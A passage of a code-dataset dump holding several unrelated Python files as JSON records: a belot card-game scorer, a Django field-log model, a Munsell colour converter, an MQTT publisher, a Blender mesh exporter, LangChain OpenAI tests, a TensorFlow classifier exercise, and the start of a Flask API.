Mjesanje with abstract methods get_rezultat\n\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n\n print('Mješanje DVA unosa', mjesanje.get_rezultat().prvi, ' - ', mjesanje.get_rezultat().drugi)\n\n mjesanje = MjesanjeTriUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n mjesanje.bodova_treci_unos = 61\n\n print('Mješanje TRI unosa', mjesanje.get_rezultat().prvi, ' - ', mjesanje.get_rezultat().drugi, ' - ',\n mjesanje.get_rezultat().treci)\n\n partija = PartijaDvaIgraca()\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n partija.mjesanja.append(mjesanje)\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.bodova_prvi_unos = 23\n mjesanje.zvanje_prvi_unos = 20\n mjesanje.bodova_drugi_unos = 78\n partija.mjesanja.append(mjesanje)\n\n print(partija)\n\n def ucitajPartije(self):\n with open('../podaci.json') as json_file:\n partije = json.load(json_file)\n for p in partije:\n if len(p['igraci']) == 2:\n partija = PartijaDvaIgraca()\n elif len(p['igraci']) == 3:\n partija = PartijaTriIgraca()\n elif len(p['igraci']) == 4:\n partija = PartijaDvaPara()\n\n partija.do_koliko_se_igra = p['doKolikoSeIgra']\n\n unosi = Igrac()\n unosi.sifra = p['unosi']['id']\n unosi.ime = p['unosi']['ime']\n unosi.prezime = p['unosi']['prezime']\n unosi.spol = p['unosi']['spol']\n partija.unosi = unosi\n\n lokacija = Lokacija()\n lokacija.sifra = p['lokacija']['id']\n lokacija.longitude = p['lokacija']['longitude']\n lokacija.latitude = p['lokacija']['latitude']\n lokacija.naziv = p['lokacija']['naziv']\n partija.lokacija = lokacija\n\n for i in p['igraci']:\n igrac = Igrac()\n igrac.sifra = i['id']\n igrac.ime = i['ime']\n igrac.prezime = i['prezime']\n igrac.spol = i['spol']\n partija.igraci.append(igrac)\n\n for m in p['mjesanja']:\n\n if 'bodovaTreciUnos' in m:\n mjesanje = MjesanjeTriUnosa()\n mjesanje.bodova_treci_unos = m['bodovaTreciUnos']\n mjesanje.zvanje_treci_unos = m['zvanjeTreciUnos']\n else:\n mjesanje = MjesanjeDvaUnosa()\n mjesanje.sifra = m['id']\n mjesanje.datum_unosa = m['datumUnosa']\n mjesanje.stiglja = m['stiglja']\n mjesanje.belot = m['belot']\n mjesanje.bodova_prvi_unos = m['bodovaPrviUnos']\n mjesanje.zvanje_prvi_unos = m['zvanjePrviUnos']\n mjesanje.bodova_drugi_unos = m['bodovaDrugiUnos']\n mjesanje.zvanje_drugi_unos = m['zvanjeDrugiUnos']\n partija.mjesanja.append(mjesanje)\n\n\n\n\n\n self._partije.append(partija)\n\n\nStart()\n","repo_name":"tjakopec/OOP_JAVA_PHP_PYTHON_SWIFT","sub_path":"Python/model/Start.py","file_name":"Start.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"sh","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"7947378264","text":"from django.db import models\nimport datetime\nfrom fieldlogs.settings import *\n\nclass Log(models.Model):\n created = models.DateTimeField(auto_now_add = True)\n updated = models.DateTimeField(auto_now = True)\n\n latitude = models.FloatField()\n longitude = models.FloatField()\n location = models.CharField( max_length = 100, null = True, blank = True, help_text = 'Name of Location if any' )\n\n subject = models.CharField( max_length = 100 )\n comment = models.TextField( null = True, blank = True )\n\n nationality = models.CharField( max_length = 50, choices = LOG_NATIONALITIES )\n birthdate = models.DateField( verbose_name = 'Date of Birth' )\n\n barcode = models.TextField( null = True, blank = True, verbose_name = 'Raw BarCode Value', help_text = 'Raw Scanned Bar-Code Value' )\n\n def photo_upload_to(instance,filename):\n return \"%s/%s/%s\" % ('photo',instance.id,filename)\n photo = models.ImageField(upload_to = photo_upload_to, null=True, blank=True, help_text = 'Photo affiliated to this Log')\n photo_caption = models.CharField( max_length = 100, null=True, blank=True)\n\n def signature_upload_to(instance,filename):\n return \"%s/%s/%s\" % ('signature',instance.id,filename)\n signature = models.ImageField(upload_to = signature_upload_to, help_text = 'Signature of Data Entrant')\n def age(self):\n return (datetime.date.today() - self.birthdate).days/365\n def view_age(self):\n return '%s Years Old' % self.age()\n view_age.short_description = 'Age'\n def view_location(self):\n #return '''\n return '''\n \n ''' % {'lat':self.latitude, 'lng':self.longitude, 'icon_uri' : '%s/images/map.png' % STATIC_URL}\n view_location.short_description = 'View Location'\n view_location.allow_tags= True\n def view_photo(self):\n try:\n return '' % (self.photo.url)\n except:\n return '' % (DEFAULT_PHOTO_URI)\n view_photo.short_description = 'Affiliated Photo'\n view_photo.allow_tags= True\n def view_signature(self):\n try:\n return '' % (self.signature.url, self.photo_caption)\n except:\n return '' % (DEFAULT_SIG_URI)\n view_signature.short_description = 'Affiliated Signature'\n view_signature.allow_tags= True\n\n def to_dict(self):\n photo_uri = ''\n try:\n photo_uri = self.photo.url\n except:\n pass\n\n sig_uri = ''\n try:\n sig_uri = self.signature.url\n except:\n pass\n\n return {\n 'ID' : self.id,\n 'LATITUDE' : self.latitude,\n 'LONGITUDE' : self.longitude,\n 'LOCATION' : self.location,\n 'SUBJECT' : self.subject,\n 'COMMENT' : self.comment,\n 'NATIONALITY' : self.get_nationality_display(),\n 'BIRTHDATE' : self.birthdate.strftime('%Y-%m-%d'),\n 'BARCODE' : self.barcode,\n 'PHOTO' : photo_uri,\n 'PHOTO_CAPTION' : self.photo_caption,\n 'SIGNATURE' : sig_uri,\n 'CREATED' : self.created.strftime('%Y-%m-%d %H:%M')\n }\n\n class Meta:\n db_table = 'logs'\n verbose_name = 'Field Log'\n verbose_name_plural = 'Field Logs'\n\n","repo_name":"mcnemesis/fieldlogs","sub_path":"logs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40189599811","text":"import math\nimport re\nimport sys\n\nfrom utils.table import table\n\n\nclass MunsellColor(object):\n '''\n This object represents a color from the Munsell color system [1].\n It stores three values: the hue, value and chroma.\n The hue should be formatted as 'stepPRINCIPAL', eg. '5R' or '8PB'.\n Step is a float from 0 to 10. The value ranges from 0 (black) to\n 10 (white). Chroma represents the purity of the color. It is\n also a float.\n Example Usage\n =============\n >>> import munsell\n >>> c = munsell.MunsellColor('10GY', 8, 16)\n >>> c.to_rgb()\n (0.2794503352552019, 0.9074706287302171, 0.2523704238358717)\n >>> [hex(int(i * 255)) for i in c.to_rgb()]\n ['0x47', '0xe7', '0x40']\n [1] http://en.wikipedia.org/wiki/Munsell_color_system\n '''\n\n def __init__(self, hue, value, chroma):\n self.hue = hue\n self.value = value\n self.chroma = chroma\n\n def to_rgb(self):\n '''\n This converts the Munsell color to a RGB color.\n The convertion is not exact, but is quite close.\n Will return a tuple of floats if successful.\n Can raise TableNotFoundError, NotInTableError.\n '''\n if self.chroma == 0:\n return self._to_rgb_gray()\n\n xyY = table.get(str(self))\n if xyY is None:\n return self._to_rgb_interpolate()\n\n return self._rgb_delinearize(self._xyy_to_rgb_linear(*xyY))\n\n def _to_rgb_gray(self):\n v = 255 * (self.value / 10.0)\n return (v, v, v)\n\n def _to_rgb_interpolate(self):\n value = self._find_valid_value\n mv = self.value\n step, principal = self.split_hue(self.hue)\n\n # Find the closet hue/chroma values in the table that are\n # above and below our color\n step_above = self._vaild_step(math.ceil(float(step) / 2.5) * 2.5)\n ha = '{}{}'.format(step_above, principal)\n ca = max(int(math.ceil(self.chroma / 2.0) * 2), 2)\n\n step_below = self._vaild_step(math.floor(float(step) / 2.5) * 2.5)\n hb = '{}{}'.format(step_below, principal)\n cb = max(int(math.floor(self.chroma / 2.0) * 2), 2)\n\n # rgb, difference factor\n a, ad = self._interpolate_munsell(\n MunsellColor(ha, value(ha, mv, ca, 1), ca),\n MunsellColor(hb, value(hb, mv, ca, 1), ca))\n b, bd = self._interpolate_munsell(\n MunsellColor(ha, value(ha, mv, ca, -1), ca),\n MunsellColor(hb, value(hb, mv, ca, -1), ca))\n c, cd = self._interpolate_munsell(\n MunsellColor(ha, value(ha, mv, cb, 1), cb),\n MunsellColor(hb, value(hb, mv, cb, 1), cb))\n d, dd = self._interpolate_munsell(\n MunsellColor(ha, value(ha, mv, cb, -1), cb),\n MunsellColor(hb, value(hb, mv, cb, -1), cb))\n\n e, ed = self._interpolate_rgb(a, b, ad, bd)\n f, fd = self._interpolate_rgb(c, d, cd, dd)\n return self._interpolate_rgb(f, e, ed, fd)[0]\n\n def _interpolate_munsell(self, a, b):\n # Generate 'closness factors' [0-1] of the a/b colors to\n # the original colors\n step = float(self.split_hue(self.hue)[0])\n step_a = float(self.split_hue(a.hue)[0])\n step_b = float(self.split_hue(b.hue)[0])\n\n hue_a, hue_b = self._closness_factors(step_a, step_b, step)\n value_a, value_b = self._closness_factors(a.value, b.value, self.value)\n chroma_a, chroma_b = self._closness_factors(a.chroma, b.chroma, self.chroma)\n closness_a = self._average_not_none(hue_a, value_a, chroma_a)\n closness_b = self._average_not_none(hue_b, value_b, chroma_b)\n\n total_diff = abs(step - step_a) + abs(step - step_b) \\\n + abs(self.value - a.value) + abs(self.value - b.value) \\\n + abs(self.chroma - a.chroma) \\\n + abs(self.chroma - b.chroma)\n\n # Blend the above/below colors bases on the closness\n return tuple([a * closness_a + b * closness_b for \\\n a, b in zip(a.to_rgb(), b.to_rgb())]), total_diff\n\n def _interpolate_rgb(self, a, b, ad, bd):\n # Opposite of the percentage of the difference, so flip a\n # and b around\n if ad + bd == 0:\n return tuple([a * 0.5 + b * 0.5 for a, b in zip(a, b)]), 0\n\n if ad == 0:\n return a, 0\n if bd == 0:\n return b, 0\n\n a_closness = bd / (ad + bd)\n b_closness = ad / (ad + bd)\n return tuple([a * a_closness + b * b_closness for \\\n a, b in zip(a, b)]), ad + bd\n\n def is_real(self):\n '''\n Tests if this is a real color, by checking if it can be\n represented using RGB.\n '''\n for v in self.to_rgb():\n if v > 1.0:\n return False\n return True\n\n def __str__(self):\n return '{} {} {}'.format(self.hue, self.value, int(self.chroma))\n\n def _rgb_delinearize(self, rgb):\n ans = [0, 0, 0]\n for i, c in enumerate(rgb):\n if c <= 0.0031308:\n ans[i] = 12.92 * c\n else:\n ans[i] = 1.055 * math.pow(c, 1 / 2.4) - 0.055\n return tuple(ans)\n\n\n def max_chroma(self, hue, value):\n m = 2\n while True:\n if '{} {} {}'.format(hue, value, m) in table:\n m += 2\n else:\n return m - 2\n\n def split_hue(self, hue):\n return re.match('([0-9.]+)([A-Z]+)', hue).groups()\n\n\n def _xyy_to_rgb_linear(self, x, y, y2):\n if abs(y) < 1e-100:\n y = 1e-100\n y2 /= 100\n x2 = y2 * x / y\n z2 = y2 * (1 - x - y) / y\n return (3.2406 * x2 - 1.5372 * y2 - 0.4986 * z2,\n -0.9689 * x2 + 1.8758 * y2 + 0.0415 * z2,\n 0.0557 * x2 - 0.2040 * y2 + 1.0570 * z2)\n\n\n def _rgb_delinearize(self, rgb):\n ans = [0, 0, 0]\n for i, c in enumerate(rgb):\n if c <= 0.0031308:\n ans[i] = 12.92 * c\n else:\n ans[i] = 1.055 * math.pow(c, 1 / 2.4) - 0.055\n return tuple(ans)\n\n\n def _vaild_step(self, step):\n # Valid steps are 2.5, 5, 7.5 and 10\n step = 10 if step > 10 else (2.5 if step < 2.5 else step)\n return int(step) if int(step) == step else step\n\n\n def _find_valid_value(self, hue, value, chroma, direction):\n round_ = math.ceil if direction == 1 else math.floor\n value = round_(value * 5) / 5\n value = int(value) if value.is_integer() else value\n\n direction_changed = False\n while True:\n if value > 10 or value < 0:\n if direction_changed:\n sys.stderr.write('Trying to interpolate, but cannot find a valid value attribute')\n direction *= -1\n direction_changed = True\n\n if '{} {} {}'.format(hue, value, chroma) in table:\n return value\n\n if (value > 1 and direction == 1) or (value > 2):\n value += direction\n value = int(value)\n else:\n value += 0.2 * direction\n value = round(value, 1)\n value = int(value) if value.is_integer() else value\n\n def _closness_factors(self, a, b, orig):\n if a == b:\n return None, None\n else:\n total_diff = float(abs(orig - a) + abs(orig - b))\n # Oppisite of the percentage of the difference, so flip a\n # and b around\n return abs(orig - b) / total_diff, abs(orig - a) / total_diff\n\n\n def _average_not_none(self, *values):\n not_none = [float(i) for i in values if i is not None]\n if len(not_none):\n return sum(not_none) / len(not_none)\n return 0.5\n","repo_name":"javiferfer/color-clustering","sub_path":"extracting_colors/utils/munsell_color.py","file_name":"munsell_color.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10729072294","text":"import time\nfrom paho.mqtt import client as mqtt_client\nimport random\n\nbroker = '192.168.1.161'\nport = 1883\nclient_id = f'python-mqtt-{random.randint(0, 1000)}'\n\n\ndef connect_mqtt():\n def on_connect(rc):\n if rc == 0:\n print(\"Connected to MQTT Broker!\")\n else:\n print(\"Failed to connect, return code %d\\n\", rc)\n # Set Connecting Client ID\n client = mqtt_client.Client(client_id)\n client.on_connect = on_connect\n client.connect(broker, port)\n return client\n\n\ndef publish(client, topic, data):\n if data is not None:\n client.publish(topic, data)\n\n\ndef publishmany(client, basetopic, data):\n for signal, values in data:\n if values is not None:\n client.publish(''.join([basetopic, signal.capitalize()]), values)\n time.sleep(2/1000)\n\n# test = connect_mqtt()\n# publish(test)\n","repo_name":"Ar0sh/HomeAutoPython","sub_path":"mqtt_client.py","file_name":"mqtt_client.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22692093945","text":"import bpy\r\nimport bmesh\r\nimport mathutils\r\n\r\nfrom typing import (\r\n\tList,\r\n\tDict,\r\n\tTuple\r\n)\r\nfrom bpy.props import (\r\n\tStringProperty,\r\n\tBoolProperty,\r\n\tFloatProperty\r\n)\r\nfrom bpy_extras.io_utils import (\r\n\tExportHelper,\r\n\torientation_helper,\r\n\taxis_conversion\r\n)\r\n\r\nclass Vertex:\r\n\tdef __init__ (\r\n\t\tself,\r\n\t\tposition : Tuple[float, float, float],\r\n\t\tnormal : Tuple[float, float, float],\r\n\t\tjoint_ids : Tuple[int, int, int, int],\r\n\t\tweights : Tuple[float, float, float]\r\n\t):\r\n\t\tself.position = position\r\n\t\tself.normal = normal\r\n\t\tself.joint_ids = joint_ids\r\n\t\tself.weights = weights\r\n\r\nclass Mesh:\r\n\tdef __init__ (\r\n\t\tself\r\n\t):\r\n\t\tself.name_to_joint_id : Dict[str, int] = {}\r\n\t\tself.joints : List[bpy.types.Bone] = []\r\n\t\tself.verts : List[Vertex] = []\r\n\t\tself.tris : List[Tuple[int, int, int]] = []\r\n\r\n\tdef from_mesh_and_armature (\r\n\t\tblender_obj : bpy.types.Object,\r\n\t\tblender_mesh : bpy.types.Mesh,\r\n\t\tblender_armature : bpy.types.Armature\r\n\t):\r\n\t\tdef append_hierarchy (joints : List[bpy.types.Bone], bone : bpy.types.Bone):\r\n\t\t\tjoints.append (bone)\r\n\t\t\tfor child in bone.children:\r\n\t\t\t\tif child.use_deform:\r\n\t\t\t\t\tappend_hierarchy (joints, child)\r\n\r\n\t\tdef groups_to_tuple4 (a):\r\n\t\t\tif len (a) == 0:\r\n\t\t\t\treturn -1, -1, -1, -1\r\n\t\t\telif len (a) == 1:\r\n\t\t\t\treturn a[0], -1, -1, -1\r\n\t\t\telif len (a) == 2:\r\n\t\t\t\treturn a[0], a[1], -1, -1\r\n\t\t\telif len (a) == 3:\r\n\t\t\t\treturn a[0], a[1], a[2], -1\r\n\t\t\treturn a[0], a[1], a[2], a[3]\r\n\r\n\t\tdef weights_to_tuple3 (a):\r\n\t\t\tif len (a) == 0:\r\n\t\t\t\treturn 0, 0, 0\r\n\t\t\telif len (a) == 1:\r\n\t\t\t\treturn round (a[0], 6), 0, 0\r\n\t\t\telif len (a) == 2:\r\n\t\t\t\treturn round (a[0], 6), round (a[1], 6), 0\r\n\t\t\treturn round (a[0], 6), round (a[1], 6), round (a[2], 6)\r\n\r\n\t\tresult = Mesh ()\r\n\t\tif blender_armature is not None:\r\n\t\t\t# Fill skeleton data\r\n\t\t\troot = None\r\n\t\t\t# Find the root bone\r\n\t\t\tfor b in blender_armature.bones:\r\n\t\t\t\tif b.parent is None and b.use_deform:\r\n\t\t\t\t\tif root is not None:\r\n\t\t\t\t\t\traise Exception (\"Found multiple root bones in armature.\")\r\n\t\t\t\t\troot = b\r\n\t\t\tif root is None:\r\n\t\t\t\traise Exception (\"Could not find root bone.\")\r\n\t\t\tappend_hierarchy (result.joints, root)\r\n\t\t\tif len (result.joints) > 0x7fff:\r\n\t\t\t\traise Exception (f\"Armature has { len (result.joints) } bones, which is more than the maximum allowed ({0x7fff}).\")\r\n\t\t\tfor i, b in enumerate (result.joints):\r\n\t\t\t\tresult.name_to_joint_id.update ({ b.name : i })\r\n\t\t# Fill vertex and triangle data\r\n\t\tvert_group_names = { g.index : g.name for g in blender_obj.vertex_groups }\r\n\t\tvertices_dict = {}\r\n\t\tfor i, poly in enumerate (blender_mesh.polygons):\r\n\t\t\tif len (poly.vertices) != 3:\r\n\t\t\t\traise Exception (\"Mesh has polygons that are not triangles. Make sure to triangulate the mesh prior.\")\r\n\t\t\ttri = []\r\n\t\t\tfor j, vert_index in enumerate (poly.vertices):\r\n\t\t\t\tif vert_index in vertices_dict:\r\n\t\t\t\t\tresult_vert_index = vertices_dict[vert_index]\r\n\t\t\t\telse:\r\n\t\t\t\t\tresult_vert_index = len (result.verts)\r\n\t\t\t\t\tvertices_dict.update ({ vert_index : result_vert_index })\r\n\t\t\t\t\tvert = blender_mesh.vertices[vert_index]\r\n\t\t\t\t\tif len (vert.groups) != 0 and blender_armature is None:\r\n\t\t\t\t\t\traise Exception (\"Mesh has vertices assigned to vertex groups, but we could not find an armature associated with it. Make sure it is parented to an armature, or it has a valid skin modifier.\")\r\n\t\t\t\t\tif len (vert.groups) > 4:\r\n\t\t\t\t\t\traise Exception (f\"Vertex {vert_index} has more than 4 groups assigned to it.\")\r\n\t\t\t\t\tgroups = groups_to_tuple4 ([g.group for g in vert.groups])\r\n\t\t\t\t\tweights = weights_to_tuple3 ([g.weight for g in vert.groups])\r\n\t\t\t\t\tjoint_ids = [-1 for i in range (len (groups))]\r\n\t\t\t\t\tfor i in range (len (groups)):\r\n\t\t\t\t\t\tif groups[i] != -1:\r\n\t\t\t\t\t\t\tname = vert_group_names[groups[i]]\r\n\t\t\t\t\t\t\tif name not in result.name_to_joint_id:\r\n\t\t\t\t\t\t\t\traise Exception (f\"Vertex is assigned to group {name} but we could not find a deform bone with this name in the armature.\")\r\n\t\t\t\t\t\t\tjoint_ids[i] = result.name_to_joint_id[name]\r\n\t\t\t\t\tresult.verts.append (Vertex (\r\n\t\t\t\t\t\ttuple (vert.co),\r\n\t\t\t\t\t\ttuple (vert.normal),\r\n\t\t\t\t\t\ttuple (joint_ids),\r\n\t\t\t\t\t\tweights\r\n\t\t\t\t\t))\r\n\t\t\t\ttri.append (result_vert_index)\r\n\t\t\tresult.tris.append ((tri[0], tri[1], tri[2]))\r\n\r\n\t\treturn result\r\n\r\n\tdef write_text (self, filename : str):\r\n\t\twith open (filename, \"wb\") as file:\r\n\t\t\tfw = file.write\r\n\t\t\tfw (b\"[1]\\n\\n\")\t# Version\r\n\t\t\tfw (b\"joint_count %u\\n\" % len (self.joints))\r\n\t\t\tfw (b\"vertex_count %u\\n\" % len (self.verts))\r\n\t\t\tfw (b\"triangle_count %u\\n\\n\" % len (self.tris))\r\n\t\t\tfw (b\"joints:\\n\")\r\n\t\t\tfor joint in self.joints:\r\n\t\t\t\tfw (b\"%s\\n\" % bytes (joint.name, 'UTF-8'))\r\n\t\t\t\tif joint.parent is not None:\r\n\t\t\t\t\tlocal_transform = joint.parent.matrix_local.inverted () @ joint.matrix_local\r\n\t\t\t\telse:\r\n\t\t\t\t\tlocal_transform = joint.matrix_local\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[0][:])\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[1][:])\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[2][:])\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f %.6f\\n\" % local_transform[3][:])\r\n\t\t\t\tif joint.parent is not None:\r\n\t\t\t\t\tfw (b\"%u\\n\\n\" % self.name_to_joint_id[joint.parent.name])\r\n\t\t\t\telse:\r\n\t\t\t\t\tfw (b\"-1\\n\\n\")\r\n\t\t\tfw (b\"vertices:\\n\")\r\n\t\t\tfor vert in self.verts:\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f\\n\" % vert.position)\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f\\n\" % vert.normal)\r\n\t\t\t\tfw (b\"%.6f %.6f %.6f\\n\" % vert.weights)\r\n\t\t\t\tfw (b\"%i %i %i %i\\n\" % vert.joint_ids)\r\n\t\t\t\tfw (b\"\\n\")\r\n\t\t\tfw (b\"triangles:\\n\")\r\n\t\t\tfor tri in self.tris:\r\n\t\t\t\tfw (b\"%u %u %u\\n\" % tuple (tri))\r\n\r\ndef export_meshes (\r\n\tcontext : bpy.types.Context,\r\n\tfilename : str,\r\n\tuse_selection : bool,\r\n\tapply_transform : bool,\r\n\taxis_conversion_matrix : mathutils.Matrix\r\n):\r\n\timport os\r\n\r\n\tif bpy.ops.object.mode_set.poll ():\r\n\t\tbpy.ops.object.mode_set (mode = 'OBJECT')\r\n\tif use_selection:\r\n\t\tobjs = context.selected_objects\r\n\telse:\r\n\t\tobjs = context.scene.objects\r\n\tfor obj in objs:\r\n\t\ttry:\r\n\t\t\tme = obj.to_mesh ()\r\n\t\texcept RuntimeError:\r\n\t\t\tcontinue\r\n\t\tarmature_obj = obj.find_armature ()\r\n\t\tarmature = bpy.types.Armature = None\r\n\t\tif armature_obj is not None:\r\n\t\t\tarmature = armature_obj.data.copy ()\r\n\t\t# Apply object transform and calculate normals\r\n\t\tif apply_transform:\r\n\t\t\tme.transform (obj.matrix_world)\r\n\t\t\tif armature is not None:\r\n\t\t\t\tarmature.transform (obj.matrix_world)\r\n\t\tif axis_conversion_matrix is not None:\r\n\t\t\tme.transform (axis_conversion_matrix.to_4x4 ())\r\n\t\t\tif armature is not None:\r\n\t\t\t\tarmature.transform (axis_conversion_matrix.to_4x4 ())\r\n\t\tme.calc_normals ()\r\n\t\t# Triangulate mesh\r\n\t\tbm = bmesh.new ()\r\n\t\tbm.from_mesh (me)\r\n\t\tbmesh.ops.triangulate (bm, faces = bm.faces[:])\r\n\t\tbm.to_mesh (me)\r\n\t\tbm.free ()\r\n\r\n\t\tresult = Mesh.from_mesh_and_armature (obj, me, armature)\r\n\t\toutput_filename = os.path.join (os.path.dirname (filename), obj.name) + Exporter.filename_ext\r\n\t\tresult.write_text (output_filename)\r\n\t\tobj.to_mesh_clear ()\r\n\t\tprint (f\"Exported mesh {obj.name} to file {output_filename}.\\n\")\r\n\r\n@orientation_helper (axis_forward = '-Z', axis_up = 'Y')\r\nclass Exporter (bpy.types.Operator, ExportHelper):\r\n\t\"\"\"Export mesh data\"\"\"\r\n\tbl_idname = \"export.anim_example_mesh\"\r\n\tbl_label = \"Export mesh with skinning (.mesh)\"\r\n\tbl_options = { 'REGISTER', 'UNDO' }\r\n\tfilename_ext = \".mesh\"\r\n\r\n\tuse_selection : BoolProperty (\r\n\t\tname = \"Only Selected\",\r\n\t\tdescription = \"Export only the selected meshes.\",\r\n\t\tdefault = True\r\n\t)\r\n\tapply_transform : BoolProperty (\r\n\t\tname = \"Apply object transform\",\r\n\t\tdescription = \"Apply the object transform matrix when exporting meshes.\",\r\n\t\tdefault = True\r\n\t)\r\n\r\n\tdef execute (self, context : bpy.types.Context):\r\n\t\tcontext.window.cursor_set ('WAIT')\r\n\t\texport_meshes (\r\n\t\t\tcontext,\r\n\t\t\tself.filepath,\r\n\t\t\tself.use_selection,\r\n\t\t\tself.apply_transform,\r\n\t\t\taxis_conversion (to_forward = self.axis_forward, to_up = self.axis_up)\r\n\t\t)\r\n\t\tcontext.window.cursor_set ('DEFAULT')\r\n\r\n\t\treturn { 'FINISHED' }\r\n\r\ndef export_menu_func (self, context : bpy.types.Context):\r\n\tself.layout.operator (Exporter.bl_idname)\r\n","repo_name":"ostef/skeletal-animation-example","sub_path":"blender/io_anim_example/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24562647467","text":"import os\n\nimport pytest\n\nfrom langchain_community.llms.openai import OpenAI\nfrom langchain_community.utils.openai import is_openai_v1\n\nos.environ[\"OPENAI_API_KEY\"] = \"foo\"\n\n\ndef _openai_v1_installed() -> bool:\n try:\n return is_openai_v1()\n except Exception as _:\n return False\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_model_param() -> None:\n llm = OpenAI(model=\"foo\")\n assert llm.model_name == \"foo\"\n llm = OpenAI(model_name=\"foo\")\n assert llm.model_name == \"foo\"\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_model_kwargs() -> None:\n llm = OpenAI(model_kwargs={\"foo\": \"bar\"})\n assert llm.model_kwargs == {\"foo\": \"bar\"}\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_invalid_model_kwargs() -> None:\n with pytest.raises(ValueError):\n OpenAI(model_kwargs={\"model_name\": \"foo\"})\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_incorrect_field() -> None:\n with pytest.warns(match=\"not default parameter\"):\n llm = OpenAI(foo=\"bar\")\n assert llm.model_kwargs == {\"foo\": \"bar\"}\n\n\n@pytest.fixture\ndef mock_completion() -> dict:\n return {\n \"id\": \"cmpl-3evkmQda5Hu7fcZavknQda3SQ\",\n \"object\": \"text_completion\",\n \"created\": 1689989000,\n \"model\": \"text-davinci-003\",\n \"choices\": [\n {\"text\": \"Bar Baz\", \"index\": 0, \"logprobs\": None, \"finish_reason\": \"length\"}\n ],\n \"usage\": {\"prompt_tokens\": 1, \"completion_tokens\": 2, \"total_tokens\": 3},\n }\n","repo_name":"langchain-ai/langchain","sub_path":"libs/community/tests/unit_tests/llms/test_openai.py","file_name":"test_openai.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":68990,"dataset":"github-code","pt":"7"} +{"seq_id":"5858773348","text":"# -*- coding = utf-8 -*-\n# @Time : 22:00\n# @Author : lolita\n# @File : Simple_Neural_Network_Practice.py\n# @Software: PyCharm\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport matplotlib.pyplot as plt\nimport warnings\nimport logging\n# 忽视某个错误\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nlogging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\ntf.autograph.set_verbosity(0)\n\n\ndef load_data():\n X = np.load(\"data/X.npy\")\n y = np.load(\"data/y.npy\")\n X = X[0:1000]\n y = y[0:1000]\n return X, y\n\n\ndef load_weights():\n w1 = np.load(\"data/w1.npy\")\n b1 = np.load(\"data/b1.npy\")\n w2 = np.load(\"data/w2.npy\")\n b2 = np.load(\"data/b2.npy\")\n return w1, b1, w2, b2\n\n\ndef sigmoid(x):\n return 1. / (1. + np.exp(-x))\n\n\n# load dataset\nX, y = load_data()\n\n'''\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n# You do not need to modify anything in this cell\nm, n = X.shape\nfig, axes = plt.subplots(8, 8, figsize=(8, 8))\nfig.tight_layout(pad=0.1)\n\nfor i, ax in enumerate(axes.flat):\n random_index = np.random.randint(m)\n # Select rows corresponding to the random indices and\n # reshape the image\n X_random_reshaped = X[random_index].reshape((20, 20)).T\n # Display the image\n ax.imshow(X_random_reshaped, cmap='gray')\n # Display the label above the image\n ax.set_title(y[random_index])\n ax.set_axis_off()\nplt.show()\n'''\n\nmodel = Sequential(\n [\n tf.keras.Input(shape=(400,)), # specify input size\n Dense(25, activation='sigmoid', name='layer1'),\n Dense(15, activation='sigmoid', name='layer2'),\n Dense(1, activation='sigmoid', name='layer3')\n ], name=\"my_model\"\n)\n# model.summary()\n\n[layer1, layer2, layer3] = model.layers\n\nmodel.compile(\n loss=tf.keras.losses.BinaryCrossentropy(),\n optimizer=tf.keras.optimizers.Adam(0.001),\n)\n\nmodel.fit(\n X, y,\n epochs=20\n)\n\nprediction = model.predict(X[0].reshape(1, 400)) # a zero\n# prediction = model.predict(X[500].reshape(1, 400)) # a one\nif prediction >= 0.5:\n yhat = 1\nelse:\n yhat = 0\nprint(f\"prediction after threshold: {yhat}\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lolitahouse/OpenCV-Practice-Project","sub_path":"Deep_Learning/Class2/Week1/Simple_Neural_Network_Practice.py","file_name":"Simple_Neural_Network_Practice.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"17382214326","text":"from flask import json, request, Response\nfrom flask_cors import CORS\nfrom flask_expects_json import expects_json\nfrom bson.json_util import dumps\nfrom bson.objectid import ObjectId\n\nfrom flask_restful import Resource\nfrom app_config import mongo\n\nfrom schema.room_schema import room_schema\n\nclass RoomsApi(Resource):\n \n def get(self):\n try:\n 